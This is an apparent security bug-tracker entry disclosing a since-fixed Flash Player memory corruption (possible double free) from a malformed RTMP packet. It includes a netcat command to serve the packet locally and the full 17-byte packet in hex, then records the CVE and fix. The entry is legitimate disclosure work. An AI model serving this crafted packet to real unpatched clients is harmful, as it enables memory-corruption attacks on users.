Starred by 5 users
Status: Fixed
Closed: Sep 2014
Flash memory corruption (double free?) with RTMP packet that aborts itself
Reported by cevans@google.com, Jul 24 2014
A SWF to reproduce is attached, along with the source. The SWF simply attempts a connection to rtmp://localhost/

The "bad" RTMP packet is attached. To replay it, use something like this (Linux command line) on the localhost machine:

nc -l 1935 < doublefree.rtmp

The packet is pretty small so here it is in its entirety:

01 02 00 00 00 00 00 04 02 00 00 00 00 00 00 00 02

Attachments:
RTMPLocal.swf (1.2 KB)
doublefree.rtmp (17 bytes)
RTMPLocal.as (2.0 KB)
Comment 1 by cevans@google.com, Jul 24 2014
Labels: Id-2915
Comment 2 by cevans@google.com, Sep 5 2014
Labels: CVE-2014-0551
Comment 3 by cevans@google.com, Sep 9 2014
Labels: Fixed-2014-Sep-9
Status: Fixed
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html

Will derestrict in a week or so, etc.
Comment 4 by cevans@google.com, Sep 23 2014
Labels: -Restrict-View-Commit
Making public.